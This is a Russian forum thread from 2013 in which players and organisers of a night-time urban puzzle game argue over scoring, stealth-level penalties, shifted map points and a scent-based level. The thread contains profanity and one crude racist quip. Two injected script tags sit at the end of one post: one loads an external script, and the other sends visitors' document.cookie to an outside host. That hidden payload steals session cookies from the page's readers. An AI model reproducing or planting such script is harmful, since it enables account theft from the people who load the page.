Форумы Dead-Line

Форумы Dead-Line (http://dead-line.spb.ru/forum/index.php)
-   Обсуждение прошедших игр (http://dead-line.spb.ru/forum/forumdisplay.php?f=14)
-   -   13.2 Чип и Дейл спешат на помощь от WTF. (http://dead-line.spb.ru/forum/showthread.php?t=6021)

Potaki 25-03-2013 21:21

а когда стату ждать?

Muzzy 25-03-2013 21:34

Цитата:

Сообщение от Го (Сообщение 261551)
Честный и объективный всекомандный штраф! Давайте исходить от обратного - кто-нибудь заходил тихо? :D

Щас боюсь показаться предвзятым. Аккуратнее всех на мой взгляд сработали брейкеры. Спокойно вошли, без лишней суеты и кипеша прочесали здание и вышли. На самом деле, проблем с "входом-выходом" не было ни у кого. Была куча претензий к командам по поводу поведения НА уровне, но коль скоро обошлось без общения с ментами, коллегиально было решено штрафов никому не навешивать. А вот за пределами забора творились мракобесие и махновщина.

Goy 25-03-2013 21:35

Вот тут сравнивают эту игру и Цирк. А мне так наоборот больше эта понравилась, т.к. не ездил по всему городу фотки собирать. Поэтому, кому как повезло - кто бонусы собирал, кто на основе был.
А деление первого уровня на 3 было хорошей идей - никто не стоял. Единственное, что-то не то было с закуркой, т.к. по факту, на прачечную было 1,5 часа вместо 3.

YaWeR 25-03-2013 22:00

Цитата:

Сообщение от Muzzy (Сообщение 261579)
Щас боюсь показаться предвзятым. Аккуратнее всех на мой взгляд сработали брейкеры. Спокойно вошли, без лишней суеты и кипеша прочесали здание и вышли. На самом деле, проблем с "входом-выходом" не было ни у кого. Была куча претензий к командам по поводу поведения НА уровне, но коль скоро обошлось без общения с ментами, коллегиально было решено штрафов никому не навешивать. А вот за пределами забора творились мракобесие и махновщина.

Во, на основании данного сообщения требую начислить всем, кроме брейкеров, штраф в размере 1,5 часа за не соблюдения правил на сталкере!
А то что менты не приехали, так это просто повезло, но все же шумели, так что штраф им!
В ДЛ1 за это точно бы штраф дали часа 3, а я тут только 1,5 предлагаю!

Punch 25-03-2013 22:18

Цитата:

Сообщение от YaWeR (Сообщение 261582)
Во, на основании данного сообщения требую начислить всем, кроме брейкеров, штраф в размере 1,5 часа за не соблюдения правил на сталкере!
А то что менты не приехали, так это просто повезло, но все же шумели, так что штраф им!
В ДЛ1 за это точно бы штраф дали часа 3, а я тут только 1,5 предлагаю!

Кстати, уважаемые орги, маленький совет по сталкерам: если уж говорите, чтобы на улицу фонарями не светили, не рисуйте коды и метки на окнах;)

Grom 25-03-2013 22:37

Чота да, второй день уже стату считают видать...

YaWeR 25-03-2013 22:44

Цитата:

Сообщение от Grom (Сообщение 261585)
Чота да, второй день уже стату считают видать...

Штрафы с учетом правил ДЛа вычисляют!=)

Jaguar 25-03-2013 23:23

Считайте, что у вас стоптайм))

G1ZM0 25-03-2013 23:52

Цитата:

Сообщение от Punch (Сообщение 261583)
Кстати, уважаемые орги, маленький совет по сталкерам: если уж говорите, чтобы на улицу фонарями не светили, не рисуйте коды и метки на окнах;)

вот +много!!:D

Jaguar 26-03-2013 10:32

а там статистики то не ожидается?

Velkopiterskij 26-03-2013 10:34

Цитата:

Сообщение от Jaguar (Сообщение 261599)
а там статистики то не ожидается?

У оргов ещё сутки в запасе.

Jaguar 26-03-2013 11:14

Цитата:

Сообщение от Velkopiterskij (Сообщение 261600)
У оргов ещё сутки в запасе.

все молчу молчу))

Гаечка 26-03-2013 12:05

Статистика посчитана, сценарии открыты.

Основная игра

Бонусная игра

Крайний срок приема апелляций - полдень 27 марта.

Гаечка 26-03-2013 12:05

Цитата:

Сообщение от Ol4ik (Сообщение 261383)

Ваня, зачем ты на брифе сказал про бонусную игру, что играть можно сколько влезет?

Цитата:

Сообщение от III007III (Сообщение 261388)
говорили что собирать бонусы можно и послетокончания основной игры, но только до 8 утра.

З.Ы. Если что, я орков не защищаю, мне игра не понравилась, да и к тому же с Гаечкой наебали =(

По информации от орга, присутствовавшего на брифе, время бонусной игры было озвучено четко: до 8 часов утра. Относительно времени бонусной игры был задан вопрос о том, ограничена ли она временем прохождения основной игры. На этот вопрос оргом был дан ответ “Нет, не ограничена: бонусная игра может продолжаться и после прохождения основной”. Кроме того, в движке в бонусной игре шел обратный отсчет времени, показывавший, сколько времени осталось у команды для прохождения этой игры.

Гаечка 26-03-2013 12:06

Цитата:

Сообщение от flaxing (Сообщение 261397)

Спасибо автороам! Рад был видеть задания, которые выполнить не удалось, также не могу отметить действительно интересные задумки, мне особенно понравился уровень с 70+ секторами и финишная анимация.

Жду открытия сценария.

Спасибо за отзыв! Вливайся, в Дедлайне всегда интересно )

Цитата:

Сообщение от flaxing (Сообщение 261397)
Если честно, ожидал 3-4 лайтовую схваточку, не обратив внимания на число авторов), так что продолжительностью вы меня тоже приятно удивили(штаба бы побольше, ждать перегоны и поиски просто зай:eek:бся).

Не-не-не, это Дедлайн, здесь лайтово не бывает )

Гаечка 26-03-2013 12:07

Цитата:

Сообщение от Punch (Сообщение 261443)
Как из задания на запахах надо выкурить, что коды есть не на всех метках - это до сих пор для меня великая тайна.

Цитата:

Сообщение от Движок

Впрочем, это совсем не мешало друзьям время от времени встречаться и устраивать дружеские соревнования в остроте нюха: например, определяя на рынке различные продукты по запаху.

Цитата:

Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.

На форуме многие уже ответили, а в сценарии можно прочитать то же самое, написанное авторами =)

Цитата:

2. При указанной последовательности уровней на игре почему нельзя было разнести для команд уровень с котом? В итоге адские стоптаймы... благо макдак в двух перекрестках).

Да, тут, конечно, вышла жесть. Мы рассчитывали, что первый уровень растянет команды (к сожалению, по причинам, которые до сих пор остаются для нас загадкой, “Конструктор” вызвал серьезные затруднения), и Котенок, распараллеленный с Кротом, не создадут значительных флешмобов. Как получилось в действительности, вы знаете.

Кстати, говоря о сталкере, уместно отметить превосходные действия игроков команды CodeBreakers и ни в какие ворота не лезущие действия игроков команды NoName.

Гаечка 26-03-2013 12:07

Цитата:

Сообщение от Kroxa (Сообщение 261466)
На какой из остановок и в каком конкретно месте был код с точки 5.3., которая бьет в ларек "Цветы.24 часа"?

Накануне игры гугл-карты обновились. В начале игры мы поняли, что все точки оказались смещены относительно тех мест, куда были поставлены изначально. К сожалению, единственным способом сохранить равные условия для всех команд (и для тех, кто звонил/писал оргам, и для тех, кто этого не делал) было сообщать только то, что знают все команды. Поэтому на ваш звонок орг сказал то, что видел в самой карте (и что, соответственно, видели игроки всех остальных команд): "Остановка пл. Мужества".

Гаечка 26-03-2013 12:08

Цитата:

Сообщение от Book'Sir (Сообщение 261489)
Зашло, спасибо, в целом молодцы :)

Первый вопрос:

сколько человек писали сталкер? если один, то на всех ли метках были коды? если на всех, то где был код на метке со стрелочкими и 5ю метрами?

Сталкер писало 2 человека, но это не помешало всем меткам иметь свои коды =) Возле метки со стрелочками код был у самой первой колонны на стене, если идти по парапету.

Гаечка 26-03-2013 12:08

Цитата:

Сообщение от Laww (Сообщение 261538)
По поводу игры:

- совершенно не понятно, зачем было делать первый 3-х часовой уровень линейным, тем более, как оказалось, с косяком в текстовке одного из подуровней, что привело к столпотворению на каждой из трех лок;

См. сценарий.

Ol4ik 26-03-2013 12:15

Цитата:

Сообщение от Гаечка (Сообщение 261608)
Накануне игры гугл-карты обновились. В начале игры мы поняли, что все точки оказались смещены относительно тех мест, куда были поставлены изначально. К сожалению, единственным способом сохранить равные условия для всех команд (и для тех, кто звонил/писал оргам, и для тех, кто этого не делал) было сообщать только то, что знают все команды. Поэтому на ваш звонок орг сказал то, что видел в самой карте (и что, соответственно, видели игроки всех остальных команд): "Остановка пл. Мужества".

чота очень напомнило :
Цитата:

"Короче, как оказалось, я не виноват. Коорды правильные, это точно. И я проверял - все было классно. Но потом началась неведомая х*йня, которая происходит и по сей момент. Во-первых, переписался сам файл закурки. Во вторых, он обращается в папку и тянет оттуда файлы, хотя этих файлов в папке нет. Короче, во всем виноват какой-то кеш хостера. Прикол в том, что нам очень повезло, просто нереально повезло. Скажи мне, какова вероятность того, что, перемешав двое кардинат совершенно рандомными кусками, ты получишь координаты места, в котором люди должны оказаться, но чуть позже? По-моему это ноль!"

Суть в том, что из-за какого-то бага часть картинок из задания была замещена картинками, использованными в тесте, и отображавшими случайно взятые координаты. В результате, по невероятной случайности, координаты в задании стали показывать на другое использованное нами место.
типа не виноватая я, он сам пришел :)

prinncessa 26-03-2013 12:16

Цитата:

Сообщение от Гаечка (Сообщение 261607)
Кстати, говоря о сталкере, уместно отметить превосходные действия игроков команды CodeBreakers и ни в какие ворота не лезущие действия игроков команды NoName.

Что натворили NoName?

И откройте плиз топ-10.

грициан 26-03-2013 12:18

Цитата:

Сообщение от Гаечка (Сообщение 261607)
(к сожалению, по причинам, которые до сих пор остаются для нас загадкой, “Конструктор” вызвал серьезные затруднения)

У вас косяк в шифровке, из-за которого невозможно было получить номер локи в викимапии до сливной подсказки.

Grom 26-03-2013 12:25

Цитата:

Сообщение от грициан (Сообщение 261614)
У вас косяк в шифровке, из-за которого невозможно было получить номер локи в викимапии до сливной подсказки.

+1 еще на игре порадовались :)

Гаечка 26-03-2013 12:28

Цитата:

Сообщение от грициан (Сообщение 261614)

В сценарии можно прочитать, что
Цитата:

Загадка основана на альбоме Constructorr - RAVE Revolution [2008]. Номер песни давал ЦИФРУ (именно поэтому Сталлоне давал 0, а не 10). Из этих цифр получался ID объекта в Викимапии.
Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой. Тем более что некоторые команды догадались даже использовать полученное число как ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.

mymy 26-03-2013 12:31

Цитата:

Сообщение от Гаечка (Сообщение 261616)
Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой.

Причины, по которой авторы считали, что команды должны догадаться взять "0" вместо "10" для меня остаются загадкой.

грициан 26-03-2013 12:38

Цитата:

В сценарии можно прочитать, что

Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой. Тем более что некоторые команды догадались даже использовать полученное число как ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.

Are you serious?

Velkopiterskij 26-03-2013 12:40

Цитата:

ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.

Спасибо, теперь известно.

Да, про точку Фейнмана повеселило.

Гаечка 26-03-2013 12:40

Цитата:

Сообщение от грициан (Сообщение 261618)
Are you serious?

Да-да, на полном серьезе! Два независимых комплекта тестировщиков без труда отбросили единицу от десятки. Для нас оказалось полной неожиданностью, что командам пришлось ждать второй подсказки, чтобы раскурить это задание. В следующий раз мы возьмем три комплекта тестировщиков =)

Гаечка 26-03-2013 12:43

Цитата:

Сообщение от Prinncess@ (Сообщение 261612)
Что натворили NoName?

Пренебрегли требованием соблюдать свето- и шумомаскировку. Однако решением агентов, согласованным с остальными оргами, штраф назначен не был.

Цитата:

Сообщение от Prinncess@ (Сообщение 261612)
И откройте плиз топ-10.

Сделано.

Laww 26-03-2013 13:08

Ваще смысла в таком сталкере нет тогда.

Heckfy 26-03-2013 13:22

"Это баскетбол, вы - негры, что непонятного?"
Это заброс без окон, на улице ночь, на локации коды...
По какому параметру замерялся уровень "дискотечности"?
Скажите мне, кто из НоНаме был на уровне, я им лицо обгладаю, потому что вместо того чтобы искать кодюли и не слить уровень, они танцевали и светили в окно...

Гаечка 26-03-2013 13:34

Цитата:

Сообщение от Heckfy (Сообщение 261631)
"Это баскетбол, вы - негры, что непонятного?"
Это заброс без окон, на улице ночь, на локации коды...
По какому параметру замерялся уровень "дискотечности"?
Скажите мне, кто из НоНаме был на уровне, я им лицо обгладаю, потому что вместо того чтобы искать кодюли и не слить уровень, они танцевали и светили в окно...

Примерно полчаса назад подробная информация предоставлена агентом ZORGer Принцессе. При необходимости мы готовы продублировать ее (информацию) куда бы то ни было еще.

Heckfy 26-03-2013 13:45

Я вам могу сам процетировать впшего агента: -"... просто никакой другой команде замечание сделано не было"
Ну блять это всё объясняет.
Короче, мне не хочется спорить с мультяхой, у нас свой есть, но когда на уровне есть окна, есть коды, фонари у команды не забирают, а игра линейная, то штрафы можно херачить по своему усмотрению любой понравившейся/непонравившейся команде.
Игра понравилась, но непонятно нахера писать про то какие эти молодцы, а эти мудаки, если решение все равно не принято. Эмоциональный фон передать разве что.

Гаечка 26-03-2013 13:48

Спасибо всем, кто играл в нашу игру! Отдельное спасибо всем, кто оставил о ней отзывы. И особенное спасибо тем, кто оставил положительные отзывы: nadlooshi, ndevil, flaxing, DJs_FAN, Heckfy, -Antoshka-, Kroxa, Confeta, Book'Sir, Pukkaras, Дмитрич, Goy.

Отдельное хочется отметить DEd_MONro и Velkopiterskij, снимавшим значительную часть вопросов команд до того, как это успевали сделать орги. Velkopiterskij, ты настолько четко и правильно воспринимал всю информацию, исходившую от оргов, что в определенный момент мы засомневались в том, что ты не делал игру вместе с нами =) Для тебя вечно открыта вакансия PR-менеджера команды WTF =)

Гаечка 26-03-2013 13:55

Цитата:

Сообщение от Heckfy (Сообщение 261633)
Я вам могу сам процетировать впшего агента: -"... просто никакой другой команде замечание сделано не было"
Ну блять это всё объясняет.
Короче, мне не хочется спорить с мультяхой, у нас свой есть, но когда на уровне есть окна, есть коды, фонари у команды не забирают, а игра линейная, то штрафы можно херачить по своему усмотрению любой понравившейся/непонравившейся команде.
Игра понравилась, но непонятно нахера писать про то какие эти молодцы, а эти мудаки, если решение все равно не принято. Эмоциональный фон передать.

Если говорить о других командах, то насчет некоторых из них вообще невозможно было догадаться, что они находятся на уровне - настолько тихо и незаметно они себя вели. И мы до сих пор сомневаемся, что единственный способ объяснить игрокам команды NoName значение слова "сталкер" - это отобрать фонарики на штурмовой игре на локации без окон и кодов.

Поведение игроков команды NoName было упомянуто исключительно для того, чтобы обратить на него внимание самой команды NoName.

Heckfy 26-03-2013 14:02

Спасибопожалуйста

Laww 26-03-2013 14:39

А где в анонсе написано, что вы не будете считать штрафы в бонусной игре?

Гаечка 26-03-2013 14:42

Цитата:

Сообщение от Laww (Сообщение 261638)

Такой информации в анонсе нет и не может быть, потому что мы изначально планировали их учитывать и в итоге учли.

Velkopiterskij 26-03-2013 14:43

Цитата:

Сообщение от Laww (Сообщение 261638)

А разве не считали? Посмотрел только что стату. Всё корректно. Каждой команде начислено 10 часов бонуса. Что бы приятнее для оргов смотрелось. Всё остальное начислено движком.

Гаечка 26-03-2013 15:07

Цитата:

Сообщение от Velkopiterskij (Сообщение 261640)
Каждой команде начислено 10 часов бонуса. Что бы приятнее для оргов смотрелось.

Именно так. Приносим извинения за то, что не акцентировали на этом внимание команд =)

Laww 26-03-2013 15:10

Спасибо!

ndevil 26-03-2013 15:36

Цитата:

Сообщение от Гаечка (Сообщение 261634)
Спасибо всем, кто играл в нашу игру! Отдельное спасибо всем, кто оставил о ней отзывы. И особенное спасибо тем, кто оставил положительные отзывы

спасибопожалуйста, но расскажите все-таки про код 9.3 на бонусной игре, правда интересно, где он там был (если вобще был), облизали по очереди в два экипажа все 4 остановки, ларек, урны, знаки, скамейки...

по игре - задумка с уровнем запахи понравилась, повеселил флешмоб на конструкторе, на перфаках почти не побывал, кроме финишного но и его хватило :) отдельное спасибо за много единичек, так уж получилось что в самом начале игры сильно повредил ногу, но даже в таком елепередвигающемся и хромающем состоянии досталось немного поснимать кодюли.

про адские стоптаймы и спать в макдаке уже итак писали, тоже не понравилось.

Clinique 26-03-2013 15:47

Цитата:

Сообщение от Muzzy (Сообщение 261579)

Хочу сделать встречное замечание, после просьбы убрать экипажи мы убрали их моментально в направлении Макдака. Хотя на месте до нас и без нас было овер дохера машин кроме наших, и причина этому реализация уровня оргами (у брейкеров как у первых стоптайм 1,5 мин) естественно что бардака не было, каково было наше удивление когда мы обнаружили на уровне сталкер вереницу из машин и толпы людей, так что претензии стоит адресовать к ответственным за проведение уровня, а не пугать посфактум штрафами команды которые вынуждены были созерцать уже допущенный бардак. как игрок суммаигр могу добавить что за такую организацию сталкера твердый кол ) Что мешало загадать соседний перекресток ? =) Почему ты не проконтролировал то о чем пишешь на игре? а втирательством занимаешь после ?

Кюхель 26-03-2013 15:57

Пост для тех, кто любит почитать.

Игра не оставила целостного впечатления, но объять необъятное, очевидно, задумка авторов :o. Распараллелить игру это интересно и храбро. Ближе к концу подумалось, что, было бы у нас чуть больше экипажей, 1 имело бы смысл отправить только на бонусы. Мы, по крайней мере, были бы за.)
Получилось же, что в голове фрагментарно-гносеологическая (прям другого слова и не подберу) каша из условий и 3-4 уровней основы и задорный многократный проезд по зоне за бонусами без практического понимания "сапёра", его сути и содержания, на голом драйве. Купленный до игры банан летал по салону, но так съеден и не был.

И вот что удалось почерпнуть. Разделю на основное и бонусные сообщения :rolleyes: :

Основное:
+ Громадное водительское спасибо за зону и отдельно за крота, это кайф. Несмотря на лагающую сеть, которая за кротом не успевала и не позволяла посекундно мониторить норы и наш первый экипаж, а также глухие заборы на дороге, одного-таки поймали, и я лично влепил ему лопатой между глаз. И по зоне игры - оказалось, такой размер зоны это преимущество. Было очень круто ловить бонусы то тут, то там - нашлась аналогия с Супер-Марио. В общем, то, что мы зацепили - в основном понравилось. Покатались знатно. И кажется, даже было небольшое подобие сюжета:p.

Бонусное:
- Орги, специально для вас: 221 рецепт блюд из фенхеля: http://www.gotovim.ru/subject/ovoshy/fenhel.shtml
Надеюсь, это позволит отныне считать забравшийся в несъедобный первый сектор фенхель (и тархун/анис, на которые запах похож), пригодным для пищи. Как вариант, сейчас после игры всё-таки проехать и прописать код на RR1=). Иначе зря мы его там, что ли, абсолютно логично искали около 2 часов.

Добью высказанную тут мысль про уровень "запахи". Идея прекрасна, окей, пусть даже будет съедобное-несъедобное, но логика съедобного должна быть командам понятна. Если вы имеете в виду то, что можно употреблять само по себе, а не как приправу, обязательно надо заложить намёк в загадку/подсказку (хотя какая там приправа, фенхель прекрасно употребляется как основа). Когда кода на однозначно съедобном секторе нет, этот момент становится ключевым. Ведь съедобное на автомате это то, что можно употребить, а не то, что вы считаете, можно употребить.
И было бы интересно узнать, что это были за запахи (все 10).

В целом эта игра = гигантская работа. Одно это достойно уважения. Спасибо.
Вымотались порядком за два подряд игровых дня, это хорошо;).

P.S. Волнует местоположение кода на Косыгина.

Pukkaras 26-03-2013 16:17

На ударников от нонейма я видел Странного. Не знаю был ли он непосредственно на локе или просто подъезжал, но если Женя там был, то я в нем уверен на 100%, светить он бы мог только там где это можно делать. Вот уж кто кто, а Странный знает как выполнять такие уровни.
И да, как верно заметил Слава, метки на окнах, это ппц, учитывая то как позицианировался уровень .

Гаечка 26-03-2013 18:03

Цитата:

Сообщение от ndevil (Сообщение 261644)
спасибопожалуйста, но расскажите все-таки про код 9.3 на бонусной игре, правда интересно, где он там был (если вобще был), облизали по очереди в два экипажа все 4 остановки, ларек, урны, знаки, скамейки...

Да, извините, забыли описать ситуацию с этим кодом.
Код был прописан на внутренней стороне ножки скамейки на второй от площади остановке, но не на той стороне, на которую указывала точка на гугл-карте, а на противоположной. Смещение вызвано обновлением гугл-карт, о котором мы уже писали. Фотография кода, скорее всего, будет доступна завтра.

Deneb 26-03-2013 18:51

Цитата:

Сообщение от Кюхель (Сообщение 261647)

P.S. Волнует местоположение кода на Косыгина.

http://floomby.ru/s1/saCb5Y

не парьтесь, все иногда не могут что то найти)

Punch 26-03-2013 22:14

Цитата:

Сообщение от Punch
Как из задания на запахах надо выкурить, что коды есть не на всех метках - это до сих пор для меня великая тайна.

Цитата:

Сообщение от Движок

Впрочем, это совсем не мешало друзьям время от времени встречаться и устраивать дружеские соревнования в остроте нюха: например, определяя на рынке различные продукты по запаху.

На рынке продаются не только продукты питания. Продукты не ограничиваются продуктами питания.
Поэтому когда Майк сказал читать двигло, это никак мне не помогло. Кстати, напишите правильные запахи, интересно, где угадал, а где нет;)

Цитата:

Сообщение от Punch
Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.
На форуме многие уже ответили, а в сценарии можно прочитать то же самое, написанное авторами =)

Не курнули, сами себе насрали, но это не отменяет очень большой потребности в подсказках по полелогике, особенно к концу 9-го часа игры... Просто на будущее, ребята, учтите.

P.S. Поставил все пятерки, так как не нашел, к чему особо придраться))

Гаечка 27-03-2013 08:34

Цитата:

Сообщение от Punch (Сообщение 261681)
Не курнули, сами себе насрали, но это не отменяет очень большой потребности в подсказках по полелогике, особенно к концу 9-го часа игры... Просто на будущее, ребята, учтите.

Панч, принято! =) Спасибо!

Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком виде. Оно не позволяет понять, где именно находится код, но он таки был =)

Just_Vinny 27-03-2013 09:40

Цитата:

Сообщение от Punch (Сообщение 261681)
Кстати, напишите правильные запахи, интересно, где угадал, а где нет;)

вот да. любопытно. мы корицу унюхали там где не было кода...
спасибо за игру, за труды. первый уровень сбил настрой немного. мнения об игре в команде разделились, от меня спасибо за Крота.
без штаба печалька в ваши игры играть :(

Гаечка 27-03-2013 12:01

Срок приема апелляций истек, апелляций не поступало.
Крайний срок выставления оценок - полдень 31 марта (вроде бы, поправьте, если 1 апреля).

Спасибо всем, кто играл!

P.S.
Список запахов из первого уровня:
  1. Фенхель
  2. Кокос
  3. Малина
  4. Лаванда
  5. Гвоздика
  6. Апельсин
  7. Нейроли
  8. Яблоко
  9. Сосна
  10. Клубника

<object width="550" height="124"><param name="movie" value="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3"></param><embed src="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3" type="application/x-shockwave-flash" width="550" height="124"></embed></object> <br> <small>Listen or <a href="http://prostopleer.com/tracks/5038084gQr2" target="_blank">download Чип и Дейл Спешат на помощь for free</a> on <a href="http://prostopleer.com/" target="_blank">Prostopleer</a></small>

miibus 27-03-2013 12:20

это фишка такая укроп фенхелем называть?

Clinique 27-03-2013 13:06

Цитата:

Сообщение от miibus (Сообщение 261726)
это фишка такая укроп фенхелем называть?

в интернетах говорят так

Цитата:

Фенхель - много летник,очень полезный,но нет укропного аромата. Даёт зелень до самого снега. Укроп -однолетник,быстро заканчивает цикл роста и не даёт зелень.Зато...аромат с картошечкой,оооооооооо

грициан 27-03-2013 13:14

Цитата:

Сообщение от Clinique (Сообщение 261732)
в интернетах говорят так

Судя по пунктуации в цитате, это очень авторитетный сайт.

Pukkaras 27-03-2013 13:29

а анисом вы чо назвали ?

ndevil 27-03-2013 14:08

Цитата:

Сообщение от Гаечка (Сообщение 261694)
Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком виде. Оно не позволяет понять, где именно находится код, но он таки был =)

спасибо, значит все-таки пиздоглазы, плюс смутило что корды били на противоположную сторону дороги.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

Clinique 27-03-2013 14:11

Цитата:

Сообщение от грициан (Сообщение 261738)
Судя по пунктуации в цитате, это очень авторитетный сайт.

Ну чего занудничаешь Гриш, тебе ссылки на вику или разницу ? =)

El Red 27-03-2013 17:06

Цитата:

Сообщение от Гаечка (Сообщение 261694)

Спалил знакомые сапоги)

CinderellA 27-03-2013 17:16

Цитата:

Сообщение от El Red (Сообщение 261768)
Спалил знакомые сапоги)

Кто здесь?

El Red 28-03-2013 14:25

Цитата:

Сообщение от CinderellA (Сообщение 261769)
Кто здесь?

нет никого :rolleyes:

а я вот чо вспомнил. седьмой-то детскую мечту исполнил? :D

Jaguar 28-03-2013 15:33

Цитата:

Сообщение от El Red (Сообщение 261809)
нет никого :rolleyes:

а я вот чо вспомнил. седьмой-то детскую мечту исполнил? :D

нет( не нашел гаечку..

Punch 29-03-2013 11:34

Цитата:

Сообщение от Гаечка (Сообщение 261721)
Список запахов из первого уровня:
  1. Фенхель
  2. Кокос
  3. Малина
  4. Лаванда
  5. Гвоздика
  6. Апельсин
  7. Нейроли
  8. Яблоко
  9. Сосна
  10. Клубника

Вот это жесть... у меня получались самбука, ваниль, вишня, клубника, пихта, персик, лимон, стиральный порошок, дерево, анис... попадание 1 из 10, и то не в тот запах)))
И да, представил: "Ало, Сгу, тут запахи разные... всего 10 штук! Какие? А, ну, это... точняк нейроли и фенхель!":D

Grom 29-03-2013 11:40

Эээ...сходи к врачу. Если обоняние так изменено, то это может быть очень плохо...О.о

miibus 29-03-2013 11:49

Цитата:

Сообщение от Grom (Сообщение 261884)
Эээ...сходи к врачу. Если обоняние так изменено, то это может быть очень плохо...О.о

зима и насморк у человека мб. по мне так все запахи одинаково пахли, только один был чётко определяемый- глинтвейн)

ZORGer 29-03-2013 12:18

Ребята, я думаю вам пора завязывать с алкоголем, раз вам Самбука и глинтвейн четко мерещится. ;))

Punch 29-03-2013 12:26

Цитата:

Сообщение от ZORGer (Сообщение 261888)
Ребята, я думаю вам пора завязывать с алкоголем, раз вам Самбука и глинтвейн четко мерещится. ;))

Да уж скорее пора наконец развязать, раз уж не помним, как самбука пахнет;)

ZORGer 29-03-2013 12:45

Цитата:

Сообщение от Punch (Сообщение 261889)

Тоже вариант. Ну так еще 4 игры и выезд. =)

Pukkaras 29-03-2013 13:04

Цитата:

Фенхель
Кокос
Малина
Лаванда
Гвоздика
Апельсин
Нейроли
Яблоко
Сосна
Клубника
Цитата:

Сообщение от Punch (Сообщение 261882)
самбука
ваниль
вишня
клубника
пихта
персик
лимон
стиральный порошок
дерево
анис...

у нас так получалось:
Анис
Кокос
Малина/карамель
Пихта
Гвоздика
Апельсин/лимон
какая то хрень
Яблоко
Сосна
Клубника/глинтвейн
так что тупо сладкие запахи в итоге смотрели

Tvaruga 29-03-2013 13:10

Цитата:

...
Нейроли
..

Цитата:

Сообщение от Pukkaras (Сообщение 261893)
...
какая то хрень
...

ну в приииинципе....

Jaguar 29-03-2013 14:31

игру то закроете? очки начислите?

Tvaruga 29-03-2013 15:01

закроем. начислим.

Кюхель 29-03-2013 15:44

Очевидно, моё предыдущее сообщение было настолько мелким, что его трудно было разглядеть.=) В следующий раз буду заметнее.

Так или иначе, по-прежнему ждём любого комментария о съедобности фенхеля.

Ol4ik 29-03-2013 15:58

да уж :) список оргов выглядит "как бы так бы заебать бы?"

Гаечка 29-03-2013 17:10

Цитата:

Сообщение от Кюхель (Сообщение 261910)
Очевидно, моё предыдущее сообщение было настолько мелким, что его трудно было разглядеть.=) В следующий раз буду заметнее.

Ой, наверное да )
Цитата:

Сообщение от Кюхель (Сообщение 261910)
Так или иначе, по-прежнему ждём любого комментария о съедобности фенхеля.

По нашему мнению, фенхель съедобен примерно настолько же, насколько съедобна гвоздика: кочанчики фенхеля, конечно, можно потушить или запечь и подать в качестве гарнира к мясу или пасте, но все-таки в первую очередь это приправа. Найдя запах черного перца, вы вряд ли посчитали бы его съедобным, верно? А запечь ведь наверняка можно даже сосновые шишки. Только стоит ли?

Heckfy 29-03-2013 18:21

Ну этож нейроли. Как не знал? Да я из дома не выйду пока полкилограмма этой нейроли не снюхаю.

Куличок 29-03-2013 20:38

А с каких пор приправа - это нечто не съедобное? Я так, для общего развития :)

Кюхель 30-03-2013 04:13

Цитата:

Сообщение от Гаечка (Сообщение 261923)
Ой, наверное да )

По нашему мнению, фенхель съедобен примерно настолько же, насколько съедобна гвоздика: кочанчики фенхеля, конечно, можно потушить или запечь и подать в качестве гарнира к мясу или пасте, но все-таки в первую очередь это приправа. Найдя запах черного перца, вы вряд ли посчитали бы его съедобным, верно? А запечь ведь наверняка можно даже сосновые шишки. Только стоит ли?

В этом-то и дело. Если "по вашему мнению" именно так, надо это мнение до команд донести. "но все-таки в первую очередь это приправа" - как мы могли понять, что приправы съедобным не считаются? На основании чего:)?

Во-первых, гвоздика приправа, а фенхель спокойно употребляется как основное блюдо (см. пару страниц назад ссылку на рецепты). Но даже если и не так (допустим, оба приправы)... Получив ориентировку "съедобное-несъедобное", как "съедобное" любой человек воспринимает то, что можно физически съесть. То есть не ядовитое и пр. И этот запах туда входит... О чёрном перце говорить не будем, там был фенхель;).

Не вполне гуманно искать код у точно съедобного запаха, когда кода там нет (ты же не можешь проверить итоговый код, будучи уверен, что это-то съедобно, и => код уровня там есть). А надо было просто в последней подсказке намекнуть, что именно вы считаете съедобным и что это не вполне обычное понимание "съедобно-несъедобного".

Zlo 30-03-2013 11:21

Гаечка уже не та...
http://cs407525.vk.me/v407525418/7367/LLsbTIBZoXo.jpg

Zlo 30-03-2013 11:26

Цитата:

Сообщение от Punch (Сообщение 261889)

Ребзя! всем срочно сюда!

был там. нюхал. круто.

Гаечка 31-03-2013 18:42

Игры закрыты, очки начислены.

Еще раз спасибо всем, кто играл, отзывался и ставил оценки )

meatgrinder 01-04-2013 13:43

http://www.google.ru/intl/ru/landing/nose/

Laww 01-04-2013 22:04

Команда ВТФ получила 14 баллов в рейтинг.

Часовой пояс GMT +3, время: 09:48.